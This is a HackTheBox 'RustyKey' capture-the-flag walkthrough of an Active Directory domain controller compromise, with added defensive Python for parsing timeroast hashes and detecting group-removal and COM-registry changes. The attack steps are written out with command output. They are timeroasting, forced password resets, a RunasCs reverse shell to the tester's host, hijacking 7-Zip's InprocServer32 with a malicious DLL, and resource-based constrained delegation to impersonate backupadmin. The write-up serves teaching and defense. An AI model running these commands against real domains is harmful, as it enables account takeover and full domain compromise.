TheLeopard65

HackTheBox - Hard - Windows - RustyKey

Author: Yasir Mehmood
HackTheBox RustyKey Machine - Banner

RustyKey is another assumed-breach scenario in which NTLM authentication is disabled but an older version of Kerberos is in use. From the BloodHound data we identify several targets, the first being it-computer3, which we can access through timeroasting. It-computer3 is a member of the Helpdesk group, which can add and remove members of the Protected Objects group and change the passwords of several accounts. We remove the IT and Support groups from Protected Objects and gain access to 2 additional accounts: BB.MORGAN (the user flag) and EE.REED. We find a memo describing additional access granted to members of the Support team, including EE.REED, over archiving utilities. Taking this as a hint, we look at the registry DLL paths for 7-Zip, which we can modify to point to an arbitrary DLL. Pointing this at our malicious DLL gives us access as MM.TURNER, who we can use to conduct an RBCD attack.

Machine Name   IP-Address    Difficulty   Machine Domain   Second Domain
RustyKey       10.10.11.75   Hard         rustykey.htb     dc.rustykey.htb

Enumeration

  • The tester performed an initial Nmap Scan and got the following results:
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo nmap -sC -sV 10.10.11.75
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 21:02 CEST
Nmap scan report for 10.10.11.75
Host is up (0.029s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 03:02:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-06-29T03:02:38
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds
  • The tester then added the IP-Address to the /etc/hosts file on the attacker system.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ echo "10.10.11.75 DC rustykey.htb" | sudo tee -a /etc/hosts
10.10.11.75 DC rustykey.htb
  • This machine was an assumed-breach scenario, as is usual for the Windows machines.
HackTheBox RustyKey Machine - Initial Breach Information
  • When attempting to authenticate with the given credentials, the tester received a STATUS_NOT_SUPPORTED error.
  • This indicates that the default authentication method, NTLM, is disabled.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec smb rustykey.htb -u rr.parker -p '8#t5HE8L!W3A'
SMB         10.10.11.75   445    10.10.11.75    [*]  x64 (name:10.10.11.75) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.75   445    10.10.11.75    [-]  rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
  • The tester then decided to set up and use the Kerberos authentication method.
  • First, the tester generated a krb5.conf file using the guide written by 0xBEN.
  • Afterwards, the tester exported the file as the active configuration file and initiated an authentication.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5_CONFIG=/home/kali/HTB/RustKey/custom_krb5.conf
kinit rr.parker
Password for rr.parker@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled
  • The tester then performed a double check on the kerberos authentication by running klist.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: rr.parker@RUSTYKEY.HTB

Valid starting       Expires              Service principal
06/29/2025 09:18:42  06/29/2025 19:18:42  krbtgt/RUSTYKEY.HTB@RUSTYKEY.HTB
        renew until 06/30/2025 09:18:38
  • The tester then exported the KRB5CCNAME variable to point at the TGT obtained through this process, which is stored in the /tmp directory.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000
  • This step is actually unnecessary, as kinit should set this by default.
  • However, the tester had been juggling several TGTs and so exported the environment variable explicitly.
  • The tester then authenticated to LDAP using Kerberos and the exported ccache, which was successful.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec ldap rustykey.htb -k --use-kcache
LDAP        rustykey.htb    389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        rustykey.htb    389    DC               [+] rustykey.htb\rr.parker from ccache
  • The tester then used netexec to collect data for enumeration with BloodHound.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec ldap rustykey.htb -k --use-kcache --dns-server 10.10.11.75 --bloodhound -c all
LDAP        rustykey.htb    389    DC               [*] None (name:DC) (domain:rustykey.htb)
.... < SNIPPING LONG OUTPUT STREAM > ....
LDAP        rustykey.htb    389    DC               Compressing output into /home/kali/.nxc/logs/DC_rustykey.htb_2025-06-29_145025_bloodhound.zip
  • Looking at the BloodHound data, the tester could not find any directly exploitable ACLs.
  • It looked like the main goal was to gain access as the NN.MARCOS user, who was a member of the Helpdesk group.
  • The Helpdesk group had the ForceChangePassword permission over several users.
  • Some of the users in question were members of the Remote Management Users and the Protected Objects groups.
HackTheBox RustyKey Machine - Permissions of the Help Group
  • The tester then started enumerating the Helpdesk group in question.
  • It was found that the it-computer3 account had the AddSelf permission over the Helpdesk group.
HackTheBox RustyKey Machine - Permissions of IT-Computer3 Account

Initial Access

  • Since the account is not a member of the Pre-Windows 2000 Compatible Access group, the only remaining option for this computer account is some form of roasting.
  • One particular method stands out for computer accounts: timeroasting. The tester decided to use timeroast.py to conduct this attack.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timeroast.py 10.10.11.75 | tee ntp-hashes.txt
[sudo] password for kali:
1000:$sntp-ms$673deff65ba0b936f611053f3bead102$1c0111e900000000000a1b344c4f434cec0b2af884ffce81e1b8428bffbfcd0aec0b4ed624ffbc0dec0b4ed624ffd892
1104:$sntp-ms$da9a7a30f696e17bb4b4731865fb1b43$1c0111e900000000000a1b344c4f434cec0b2af8829b7d9fe1b8428bffbfcd0aec0b4ed6d2bc3321ec0b4ed6d2bc4a9e
1103:$sntp-ms$c54e367acabfdf8ae049616c06516c60$1c0111e900000000000a1b344c4f434cec0b2af8829b0178e1b8428bffbfcd0aec0b4ed6d2bbb044ec0b4ed6d2bbd1d2
1105:$sntp-ms$13b40597252d73a45e01cb98399496b0$1c0111e900000000000a1b344c4f434cec0b2af8829bba05e1b8428bffbfcd0aec0b4ed6d6935836ec0b4ed6d693a3b6
1106:$sntp-ms$0eeaa19ae46e8b15a32cd631b73bcce6$1c0111e900000000000a1b344c4f434cec0b2af8843916a2e1b8428bffbfcd0aec0b4ed6d830b82eec0b4ed6d830f99d
1107:$sntp-ms$5039dbb0876228e38dc2f241064e3fe3$1c0111e900000000000a1b344c4f434cec0b2af885bed817e1b8428bffbfcd0aec0b4ed6d9b677f6ec0b4ed6d9b6c01b
1121:$sntp-ms$e4e780762ee1e408b365049937c9e035$1c0111e900000000000a1b354c4f434cec0b2af884acc921e1b8428bffbfcd0aec0b4ed6ec9c4545ec0b4ed6ec9c779a
1120:$sntp-ms$7a0907455dad90ca9538a7f175d94dca$1c0111e900000000000a1b354c4f434cec0b2af884a9ebf7e1b8428bffbfcd0aec0b4ed6ec9973d9ec0b4ed6ec999715
1118:$sntp-ms$a27dee3aad3c978ed6c52a603026e7fd$1c0111e900000000000a1b354c4f434cec0b2af8848f6639e1b8428bffbfcd0aec0b4ed6ec7ef680ec0b4ed6ec7f0c4f
1119:$sntp-ms$855ad8d96730a4e5fa6b3492378e52b4$1c0111e900000000000a1b354c4f434cec0b2af884924a19e1b8428bffbfcd0aec0b4ed6ec81c999ec0b4ed6ec81f538
1122:$sntp-ms$ff95d282096729712b1275fbb39a814d$1c0111e900000000000a1b354c4f434cec0b2af883f81f60e1b8428bffbfcd0aec0b4ed6f0001e32ec0b4ed6f0006804
1123:$sntp-ms$fd93afeae388bba24361afbd791d6dcd$1c0111e900000000000a1b354c4f434cec0b2af883f92a22e1b8428bffbfcd0aec0b4ed6f0013d16ec0b4ed6f0016dbe
1125:$sntp-ms$c1a103e9a3cc75e7a525ee1f07663272$1c0111e900000000000a1b354c4f434cec0b2af883099905e1b8428bffbfcd0aec0b4ed6f32a411cec0b4ed6f32a6e68
1124:$sntp-ms$f470bb24f1a392e4a54b937dc3e71b07$1c0111e900000000000a1b354c4f434cec0b2af88308a5c0e1b8428bffbfcd0aec0b4ed6f3294573ec0b4ed6f3297cd1
1127:$sntp-ms$888e560b0110dcdd8f8c7875d2ac570a$1c0111e900000000000a1b354c4f434cec0b2af8827235a7e1b8428bffbfcd0aec0b4ed6f669e9a8ec0b4ed6f66a16f5
1126:$sntp-ms$a561e867a6d41b1f24759f7e3488f568$1c0111e900000000000a1b354c4f434cec0b2af88271913ce1b8428bffbfcd0aec0b4ed6f6692c13ec0b4ed6f6697c9b
.... < SNIPPING LONG OUTPUT STREAM > ....
  • The tester was able to pinpoint the relevant hash thanks to the rid-brute attack conducted earlier.
  • The hash of most relevance was RID 1125, as that was the RID of IT-COMPUTER3.
  • The tester then used the bundled timecrack tool, found in the same repository, to crack the hashes.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timecrack.py ../ntp_hashes.txt rockyou_clean.txt
[+] Cracked RID 1125 password: [REDACTED]
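To make timeroast.py output like the above easier to triage, here is an added example (my own code, not part of this writeup or of the timeroast repository) that parses one RID:$sntp-ms$<digest>$<packet> line and decodes the 48-byte NTP response the DC sent. The sample line is the page's RID 1000 entry; the field names are my own, and the code does no cracking, it only shows which RIDs the DC answered for and what the digest covers.

```python
import re
import struct
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sample: the page's RID 1000 line, in the form
# "RID:$sntp-ms$<MD5 digest>$<48-byte NTP server response>".
SAMPLE_LINE = (
    "1000:$sntp-ms$673deff65ba0b936f611053f3bead102$"
    "1c0111e900000000000a1b344c4f434cec0b2af884ffce81e1b8428bffbfcd0a"
    "ec0b4ed624ffbc0dec0b4ed624ffd892"
)

LINE_RE = re.compile(r"^(\d+):\$sntp-ms\$([0-9a-f]{32})\$([0-9a-f]{96})$")
NTP_EPOCH = datetime(1900, 1, 1, tzinfo=timezone.utc)


def ntp_time(seconds: int, fraction: int) -> datetime:
    """Convert an NTP 64-bit timestamp (seconds since 1900 plus a 32-bit fraction)."""
    return NTP_EPOCH + timedelta(seconds=seconds + fraction / 2**32)


@dataclass
class TimeroastEntry:
    rid: int            # RID of the computer account whose key the DC used for the reply
    digest: str         # MD5 authenticator that a cracker tests candidate passwords against
    version: int
    mode: int           # 4 = server reply
    stratum: int
    ref_id: str
    reference_time: datetime
    transmit_time: datetime


def parse_timeroast_line(line: str) -> TimeroastEntry:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a timeroast hash line: {line!r}")
    rid, digest, packet_hex = int(m.group(1)), m.group(2), m.group(3)
    pkt = bytes.fromhex(packet_hex)
    # RFC 5905 header: LI/VN/mode byte, stratum, poll, precision, root delay,
    # root dispersion, reference id, then reference/origin/receive/transmit stamps.
    (flags, stratum, _poll, _precision, _root_delay, _root_disp, ref_id,
     ref_s, ref_f, _org_s, _org_f, _rx_s, _rx_f, tx_s, tx_f) = struct.unpack(
        "!BBbbII4sIIIIIIII", pkt)
    return TimeroastEntry(
        rid=rid, digest=digest,
        version=(flags >> 3) & 0x7, mode=flags & 0x7, stratum=stratum,
        ref_id=ref_id.decode("ascii", "replace"),
        reference_time=ntp_time(ref_s, ref_f), transmit_time=ntp_time(tx_s, tx_f),
    )


def targeted_rids(lines) -> list:
    """RIDs the DC answered for: the computer accounts exposed in this roasting pass."""
    return sorted({parse_timeroast_line(l).rid for l in lines if l.strip()})
```

The decoded transmit timestamp is the DC's own clock, which is how the 8-hour skew seen in the Nmap output can be confirmed from the captured packets.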
  • The tester was able to recover the credentials for the it-computer3$ account.
  • The next step was to add the controlled computer account to the Helpdesk group.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k add groupMember Helpdesk it-computer3$
[+] it-computer3$ added to Helpdesk
  • After successfully adding the it-computer3$ account to the Helpdesk group, the tester used the getTGT script from Impacket to obtain its TGT.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getTGT  'RUSTYKEY.HTB/it-computer3$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Saving ticket in it-computer3$.ccache

Lateral Movement #1

  • After enumerating the Protected Objects group, the tester saw that most of the users were members of it.
  • This meant that even after resetting their passwords, authentication would not succeed.
  • This is because authenticating as a member of Protected Objects requires that user's TGT.
  • However, in this case the tester was able to AddMember on Protected Objects.
  • This is not too useful on its own, but the same permission also allows removing members.
  • The tester decided to remove the IT group from Protected Objects using the bloodyAD tool.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" IT
[-] IT removed from Protected Objects
  • Removing the IT group from Protected Objects allowed the tester to reset the password for the bb.morgan user.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password bb.morgan Wild1234!
[+] Password changed successfully!
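From the defender's side, the sequence in this section (a group removed from Protected Objects, then a password reset by the same actor shortly after) is the signal worth alerting on. As an added example that is not part of this writeup, the Python below correlates constructed, simplified Windows Security events: the event IDs (4729/4733/4757 for a member removed from a security-enabled global/local/universal group, 4724 for a password reset attempt) are standard, while the field names, the subject account and the 60-minute window are my assumptions.

```python
from datetime import datetime, timedelta

# Which removal event fires depends on the group's scope, so watch all three.
GROUP_REMOVAL_IDS = {4729, 4733, 4757}
PASSWORD_RESET_ID = 4724
WATCHED_GROUPS = {"protected objects"}      # compared case-insensitively
WINDOW = timedelta(minutes=60)

# Constructed, simplified events (field names are assumptions, not raw event XML).
SAMPLE_EVENTS = [
    {"time": "2025-06-29T10:02:11", "id": 4729, "subject": "IT-COMPUTER3$",
     "group": "Protected Objects", "member": "CN=IT,OU=Groups,DC=rustykey,DC=htb"},
    {"time": "2025-06-29T10:05:40", "id": 4724, "subject": "IT-COMPUTER3$",
     "target": "bb.morgan"},                 # reset minutes after the removal: alert
    {"time": "2025-06-29T13:30:00", "id": 4724, "subject": "IT-COMPUTER3$",
     "target": "ee.reed"},                   # same subject, but outside the window
    {"time": "2025-06-29T10:20:00", "id": 4724, "subject": "svc.helpdesk",
     "target": "ff.other"},                  # no prior removal by this subject
]


def correlate(events, window=WINDOW):
    """Return one alert per password reset that follows, within `window`,
    a removal from a watched group performed by the same subject."""
    removals = {}   # subject -> [(time, group, removed member), ...]
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        subject = ev["subject"].lower()
        if ev["id"] in GROUP_REMOVAL_IDS and ev["group"].lower() in WATCHED_GROUPS:
            removals.setdefault(subject, []).append((t, ev["group"], ev["member"]))
        elif ev["id"] == PASSWORD_RESET_ID:
            for removed_at, group, member in removals.get(subject, []):
                if timedelta(0) <= t - removed_at <= window:
                    alerts.append({
                        "subject": ev["subject"], "target": ev["target"],
                        "group": group, "member": member,
                        "minutes_after_removal": (t - removed_at).total_seconds() / 60,
                    })
    return alerts
```

The correlation keys on the acting subject rather than on the removed member, because the events alone do not reveal that bb.morgan was covered through the IT group's nested membership.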
  • After which, the tester was able to authenticate as bb.morgan user through kinit utility.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ kinit bb.morgan
Password for bb.morgan@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled
  • Since bb.morgan user was a member of Remote Management Users Group, it allowed the tester to get a WinRM shell.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> dir ../Desktop

    Directory: C:\Users\bb.morgan\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---        7/10/2025   7:02 PM             34 user.txt
  • The tester was able to gain access as the bb.morgan user and also found a PDF on Desktop.

Lateral Movement #2

  • After transferring the PDF to the attacker system, the tester was able to read the following email.
Internal Memo

From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100

Hey team,
	As part of the new Support utilities rollout, extended access has been temporarily granted to allow testing and
troubleshooting of file archiving features across shared workstations. This is mainly to help streamline ticket
resolution related to extraction/compression issues reported by the Finance and IT teams. Some newer systems handle
context menu actions differently, so registry-level adjustments are expected during this phase.

A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed stable in all
environments.
- Let DevOps know if you encounter access errors or missing shell actions.

Thanks,
BB Morgan
IT Department
  • It looked like a memo informing the Support team members, including ee.reed, that they had access to archiving tools.
  • The memo also mentioned that registry-level adjustments could be expected during this phase.
  • This indicated that Support might have access to modify the registry keys related to the archiving tools.
  • Therefore, with ee.reed as the current target, the tester first removed the Support group from Protected Objects.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" SUPPORT
[-] SUPPORT removed from Protected Objects
  • The tester was then able to change the password of the ee.reed user, since that user's group was no longer part of Protected Objects.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password ee.reed 'Wild1234!'
[+] Password changed successfully!
  • However, the tester was still unable to authenticate using the WinRM, LDAP, or SMB authentication methods.
  • So instead, the tester used the RunasCs tool, created by @antonioCoco.
*Evil-WinRM* PS C:\Windows\Temp> ./RunasCs.exe ee.reed Wild1234! cmd.exe -r 10.10.16.75:3232
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-46cab11$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3264 created in background.
  • The tester was successfully able to receive the reverse shell on the netcat listener.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 3232
listening on [any] 3232 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

PS C:\Users> whoami
rustykey\ee.reed

Privilege Escalation

  • Having found that members of the Support group (such as ee.reed) have privileges over the registry,
  • the tester decided to enumerate the registry hives and attempt privilege escalation through them.
  • The tester used the following script to check for writable DLL paths in the registry.
PS C:\Windows\system32> Get-ChildItem HKLM:\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object {
>>     try {
>>         $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\', '')
>>         $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true)
>>         $regKey.SetValue('TestWrite','1')
>>         $regKey.DeleteValue('TestWrite')
>>         $true
>>     } catch {
>>         $false
>>     }
>> }

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID

Name                                          Property
----                                          --------
{23170F69-40C1-278A-1000-000100020000}        (default) : 7-Zip Shell Extension

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}

Name                           Property
----                           --------
InprocServer32                 (default)      : C:\Program Files\7-Zip\7-zip.dll
                               ThreadingModel : Apartment
  • The tester was then able to alter the (default) value of the InprocServer32 key under the following hive:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
  • The tester used this misconfiguration to point the value at a malicious DLL.
PS C:\Windows\Tasks> Set-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\Windows\Tasks\w.dll"
PS C:\Windows\Tasks> Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"

(default)      : C:\Windows\Tasks\w.dll
ThreadingModel : Apartment
PSPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
PSParentPath   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
PSChildName    : InprocServer32
PSDrive        : HKLM
PSProvider     : Microsoft.PowerShell.Core\Registry
  • After making the required changes, the tester had to wait for about a minute to receive a reverse shell Connection.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
whoami
rustykey\mm.turner
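The registry change that produced the shell above (a CLSID's InprocServer32 repointed to a DLL under C:\Windows\Tasks) is exactly what Sysmon Event ID 13 (RegistryEvent: Value Set) records. As an added example, not from this writeup, the Python below flags such events whenever the new server path lies outside the usual install locations; the sample events, the trusted-root list and the environment-variable expansions are constructed assumptions.

```python
import re

# Constructed Sysmon Event ID 13 records, trimmed to the fields the check needs;
# the first mirrors the page's change, the second a legitimate 7-Zip install.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": "RUSTYKEY\\ee.reed",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32\\(Default)",
     "Details": "C:\\Windows\\Tasks\\w.dll"},
    {"EventID": 13, "User": "NT AUTHORITY\\SYSTEM",
     "Image": "C:\\Users\\admin\\Downloads\\7z-setup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32\\(Default)",
     "Details": "C:\\Program Files\\7-Zip\\7-zip.dll"},          # trusted path: no alert
    {"EventID": 13, "User": "RUSTYKEY\\ee.reed",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32\\ThreadingModel",
     "Details": "Apartment"},                                     # not the server path: ignored
]

# Matches HKLM and per-user (HKU\...\Software\Classes) CLSID server paths alike.
INPROC_DEFAULT_RE = re.compile(
    r"\\Classes\\CLSID\\\{[0-9A-Fa-f-]{36}\}\\InprocServer32\\\(Default\)$", re.IGNORECASE)

# Directories a normal COM server DLL lives under (assumption: tune per estate).
TRUSTED_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                 "c:\\program files\\", "c:\\program files (x86)\\")
ENV_EXPANSIONS = {"%systemroot%": "c:\\windows", "%programfiles%": "c:\\program files"}


def normalise_path(value: str) -> str:
    """Lower-case, strip surrounding quotes and expand the common environment variables."""
    p = value.strip().strip('"').lower()
    for var, real in ENV_EXPANSIONS.items():
        p = p.replace(var, real)
    return p


def inproc_server_alert(event: dict):
    """Return an alert dict if this Value Set event redirects a CLSID's
    InprocServer32 to an untrusted location, otherwise None."""
    if event.get("EventID") != 13 or not INPROC_DEFAULT_RE.search(event["TargetObject"]):
        return None
    dll = normalise_path(event["Details"])
    if dll.startswith(TRUSTED_ROOTS):
        return None
    clsid = event["TargetObject"].split("\\")[-3]
    return {"clsid": clsid, "dll": event["Details"], "user": event["User"], "image": event["Image"]}


def scan(events):
    return [a for a in (inproc_server_alert(e) for e in events) if a]
```

A hardening counterpart is to audit the ACL on HKLM\SOFTWARE\Classes\CLSID so that no non-administrative group, such as Support here, can write to it at all.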
  • The tester then discovered through BloodHound that the mm.turner user is a member of the DelegationManagers group.
  • This means the user can act on behalf of the Domain Controller (DC).
  • First, the tester configured the DC$ account to allow the IT-Computer3$ account to delegate to it.
PS C:\Windows> Set-ADComputer DC$ -PrincipalsAllowedToDelegateToAccount 'it-computer3$'
PS C:\Windows> Get-ADComputer DC$ -Properties PrincipalsAllowedToDelegateToAccount

DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName                          : dc.rustykey.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName                    :
  • The next step of RBCD is to obtain a Service Ticket and the tester did just that.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getST -spn "CIFS/dc.rustykey.htb" -impersonate backupadmin -dc-ip 10.10.11.75 "rustykey.htb/rr.parker:'8#t5HE8L!W3A'"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
/home/kali/.local/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/home/kali/.local/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache
  • After getting the ccache file, the tester then performed a check for authentication.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=$(pwd)/backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ nxc smb dc.rustykey.htb -k -u backupadmin --use-kcache -X "dir C:\Users\Administrator\Desktop"
SMB         DC.rustykey.htb 445    DC               [*]  x64 (name:DC) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.rustykey.htb 445    DC               [+] rustykey.htb\backupadmin from ccache (Pwn3d!)
SMB         DC.rustykey.htb 445    DC               [+] Executed command via wmiexec
SMB         DC.rustykey.htb 445    DC                   Directory: C:\Users\Administrator\Desktop
SMB         DC.rustykey.htb 445    DC               Mode                LastWriteTime         Length Name
SMB         DC.rustykey.htb 445    DC               ----                -------------         ------ ----
SMB         DC.rustykey.htb 445    DC               -ar---        7/10/2025   7:02 PM             34 root.txt
.... < SNIPPING LONG OUTPUT STREAM > ....
  • As can be seen in the above output, the tester was able to execute commands on the DC as backupadmin.
  • This meant that the RustyKey machine on HackTheBox was now complete.
HackTheBox RustyKey Machine - Machine Completed